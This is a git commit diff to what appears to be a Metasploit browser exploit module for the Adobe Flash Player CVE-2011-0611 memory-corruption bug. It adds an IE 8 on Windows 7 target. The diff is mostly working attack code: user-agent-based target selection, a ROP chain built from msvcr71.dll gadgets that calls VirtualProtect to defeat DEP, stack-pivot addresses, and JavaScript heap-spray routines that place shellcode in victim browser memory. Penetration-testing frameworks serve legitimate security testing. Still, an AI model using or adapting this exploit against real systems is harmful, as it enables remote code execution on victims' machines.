Add Windows 7 target and all kinds of stuff.

git-svn-id: file:///home/svn/framework3/trunk@13775 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Wei Chen 2011-09-22 17:40:35 +00:00
parent 5c41385284
commit ec6f290fbd
1 changed files with 145 additions and 111 deletions

View File

@ -20,12 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",
'Description' => %q{
This module exploits a vulnerability in Adobe Flash Player that was discovered, and
has been exploited actively in the wild. By embedding a specially crafted .swf file,
Adobe Flash crashes due to an invalid use of an object type, which allows attackers to
overwrite a pointer in memory, and results arbitrary code execution. Please note for
IE 8 targets, mscorie.dll (a .Net component) must be available on the victim machine
in order to work properly.
This module exploits a vulnerability in Adobe Flash Player that was discovered,
and has been exploited actively in the wild. By embedding a specially crafted .swf
file, Adobe Flash crashes due to an invalid use of an object type, which allows
attackers to overwrite a pointer in memory, and results arbitrary code execution.
Please note for IE 8 targets, Java Runtime Environment must be available on the
victim machine in order to work properly.
},
'License' => MSF_LICENSE,
'Version' => "$Revision$",
@ -58,10 +58,61 @@ class Metasploit3 < Msf::Exploit::Remote
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 6 on Windows XP SP3', { 'Rop' => false } ],
[ 'IE 7 on Windows XP SP3', { 'Rop' => false } ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => true } ],
[ 'IE 7 on Windows Vista', { 'Rop' => false } ],
[
'IE 6 on Windows XP SP3',
{
'Rop' => false,
'Pivot' => nil, #No ROP no pivot
'Offset1' => '0x01', #For aligning the payload
'Offset2' => '0x02', #For aligning the CALL
'Max1' => '0x150', #First spray
'Max2' => '0x200' #Second spray
}
],
[
'IE 7 on Windows XP SP3',
{
'Rop' => false,
'Pivot' => nil, #No ROP no pivot
'Offset1' => '0x01', #For aligning the payload
'Offset2' => '0x02', #For aligning the CALL
'Max1' => '0x150', #First spray
'Max2' => '0x200' #Second spray
}
],
[
'IE 8 on Windows XP SP3',
{
'Rop' => true,
'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)
'Offset1' => '0x5E2', #Offset for rop+payload
'Offset2' => '0x02', #Offset to 0x11111110
'Max1' => '0x250', #First spray
'Max2' => '0x200' #Second spray
}
],
[
'IE 7 on Windows Vista',
{
'Rop' => false,
'Pivot' => nil, #No ROP no pivot
'Offset1' => '0x01', #For aligning the payload
'Offset2' => '0x02', #For aligning the CALL
'Max1' => '0x150', #First spray
'Max2' => '0x200' #Second spray
}
],
[
'IE 8 on Windows 7',
{
'Rop' => true,
'Pivot' => 0x7c348b05, #XCHG EAX,ESP; RETN (MSVCR71.dll)
'Offset1' => '0x5F4', #Offset for rop+payload
'Offset2' => '0x02', #Offset to 0x11111110
'Max1' => '0x150', #First spray
'Max2' => '0x200' #Second spray
}
]
],
'Privileged' => false,
'DisclosureDate' => "Apr 11 2011",
@ -75,12 +126,10 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
#Load the trigger file
path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2011-0611.swf")
f = File.open(path, "rb")
@trigger = f.read(f.stat.size)
f.close
super
end
@ -93,21 +142,20 @@ class Metasploit3 < Msf::Exploit::Remote
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
#Windows XP SP3 + IE 7.0
return targets[2]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ and agent =~ /\.NET CLR 2\.0/
#Windows XP SP3 + IE 8.0 + .Net CLR 2.0
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
#Windows XP SP3 + IE 8.0 + JRE6
return targets[3]
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7\.0/
#Windows Vista + IE 7
return targets[4]
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8\.0/
#Windows 7 + IE 8 + JRE6
return targets[5]
else
return nil
end
end
def junk
return rand_text_alpha(4).unpack("L")[0].to_i
end
def on_request_uri(cli, request)
#Set default target
my_target = target
@ -115,118 +163,104 @@ class Metasploit3 < Msf::Exploit::Remote
#If user chooses automatic target, we choose one based on user agent
if my_target.name =~ /Automatic/
my_target = get_target(request)
#No suitable target, we go ninja mode
if my_target.nil?
send_not_found(cli)
print_error("#{cli.peerhost}:#{cli.peerport} Unknown user-agent")
return
end
print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
vprint_status("Target selected: #{my_target.name}")
end
uri = request.uri
print_status("URL: #{uri}") if datastore['VERBOSE']
vprint_status("URL: #{request.uri}")
if uri =~ /\.swf$/
if request.uri =~ /\.swf$/
#Browser requests our trigger file, why not
print_status("Sending trigger SWF to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, @trigger, {'Content-Type'=>'application/x-shockwave-flash'} )
return
elsif uri =~ /\.dll$/
#Throw the browser a fake .Net DLL so mscorie.dll will load
print_status("Sending .NET dll to #{cli.peerhost}:#{cli.peerport}...")
ibase = (0x2000 | rand(0x8000)) << 16
#Generate our .Net DLL with random data
dll = Msf::Util::EXE.to_dotnetmem(ibase, rand_text(16))
#Generate our headers for the browser to download the dll
headers = {
'Content-Type' => 'application/x-msdownload',
'Connection' => 'close',
'Pragma' => 'no-cache'
}
send_response(cli, dll, headers)
return
end
#The type of arch our victim machine is running
#Targets that don't need ROP
rop = ''
pivot = "\xb8\x0c\x0c\x0c\x0c" #MOV EAX,0x0c0c0c0c
pivot << "\xff\xe0" #JMP EAX
pivot << "\x41" #Pad
#Targets that need ROP
if my_target['Rop']
#Target Addr=0x0c0c0c0c
rop =
[
0x7c376402, # POP EBP # RETN [msvcr71.dll]
0x7c376402, # skip 4 bytes [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0xfffff800, # Value to negate, will become 0x00000201 (dwSize)
0x7c351e05, # NEG EAX # RETN [msvcr71.dll]
0x7c354901, # POP EBX # RETN [msvcr71.dll]
0xffffffff,
0x7c345255, # INC EBX # FPATAN # RETN [msvcr71.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
0x7c344f87, # POP EDX # RETN [msvcr71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [msvcr71.dll]
0x7c34d201, # POP ECX # RETN [msvcr71.dll]
0x7c38b001, # &Writable location [msvcr71.dll]
0x7c34b8d7, # POP EDI # RETN [msvcr71.dll]
0x7c347f98, # RETN (ROP NOP) [msvcr71.dll]
0x7c364802, # POP ESI # RETN [msvcr71.dll]
0x7c3415a2, # JMP [EAX] [msvcr71.dll]
0x7c347f97, # POP EAX # RETN [msvcr71.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
0x7c345c30, # ptr to 'push esp # ret ' [msvcr71.dll]
].pack("V*")
#Target Addr=0x11111110
pivot =
[
0x0c0c0c0c, # Padding. Value for ESP after the XCHG pivot
my_target['Pivot'], # ROP Pivot
0x7c346b52, # EAX (POP ESP; RETN)
].pack('V*')
end
arch = Rex::Arch.endian(my_target.arch)
if my_target['Rop']
#DEP is enabled, rop it like a rop star
net_dll_name = "#{get_resource}/generic-" + Time.now.to_i.to_s + ".dll"
js_net_dll = "<object classid=\"#{net_dll_name}\"#GenericControl\"></object>"
#Land it exactly at 0x11111110
rop =
[
0x63F031D8, #POP ECX; POP ESI; RETN
junk,
0x7E451509, #XCHG EAX,ESP; RETN in USER32
0x63f04d74, #CALL mscorie!_imp_VirtualProtect
0x11111138, #Param: shellcode (Target address = 0x11111110+0x24)
0x900, #Param: size (2304)
0x40, #Param: newProtect
0x11111110, #Param: oldProtect
0x11111138, #RETN (Target address = 0x11111110+0x24)
junk,
].pack('V*')
#Our payload will land at 11111110
shellcode = Rex::Text.to_unescape(rop + payload.encoded, arch)
nops = Rex::Text.to_unescape(rand_text_alpha(4), arch)
#Heap spray routine
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{shellcode}");
var nops = unescape("#{nops}");
while (nops.length < 0x1000) nops += nops;
offset = nops.substring(0, 0x62);
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
while (shellcode.length < 0x20000) shellcode += shellcode;
block = shellcode.substring(0, (0x10000-6)/2);
heap_obj.gc();
for (var i=0; i < 0x1000; i++) {
heap_obj.alloc(block);
}
JS
p = rop + payload.encoded
shellcode = Rex::Text.to_unescape(p, arch)
pivot = Rex::Text.to_unescape(pivot, arch)
#Extract string based on target
if my_target.name == 'IE 8 on Windows 7'
js_extract_str = "var block = shellcode.substring(0, (0x7ffc0-6)/2);"
elsif my_target.name == 'IE 8 on Windows XP SP3'
js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
else
#No DEP, giggity. 0x0c0c0c0c is our target address
nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
shellcode = Rex::Text.to_unescape(payload.encoded, arch)
#Heap spray routine
js = <<-JS
var heap_obj = new heapLib.ie(0x20000);
var code = unescape("#{shellcode}");
var nops = unescape("#{nops}");
while (nops.length < 0x1000) nops += nops;
var shellcode = nops.substring(0, 0x1000-code.length) + code;
while (shellcode.length < 0x20000) shellcode += shellcode;
block = shellcode.substring(0, (0x10000-6)/2);
heap_obj.gc();
for (var i=0; i < 0x1000; i++) {
heap_obj.alloc(block);
}
JS
js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
end
#Implement heaplib
js = heaplib(js)
js = <<-JS
function heap_spray(heaplib, nops, code, offset, max) {
while (nops.length < 0x2000) nops += nops;
var offset = nops.substring(0, offset);
var shellcode = offset + code + nops.substring(0, 0x2000-code.length-offset.length);
while (shellcode.length < 0x40000) shellcode += shellcode;
#{js_extract_str}
heaplib.gc();
for (var i=1; i<max; i++) {
heaplib.alloc(block);
}
}
var heap_obj = new heapLib.ie(0x20000);
var nops = unescape("%u0c0c%u0c0c");
var code = unescape("#{shellcode}");
heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});
var fake_pointers = unescape("#{pivot}");
heap_spray(heap_obj, fake_pointers, fake_pointers, #{my_target['Offset2']}, #{my_target['Max2']});
JS
js = heaplib(js, {:noobfu => true} )
#Javascript obfuscation is optional
if datastore['OBFUSCATE']
@ -244,7 +278,6 @@ class Metasploit3 < Msf::Exploit::Remote
</script>
</head>
<body>
#{js_net_dll}
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="0" height="0"
codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
<param name="movie" value="#{trigger_file_name}" />
@ -279,4 +312,5 @@ Flash10o+0xd01f6:
01d65100 00000000 00000000 00000000 00000000
01d65110 00000000 00000000 00000000 00000000
01d65120 00000000 00000000 00000000 00000000
=end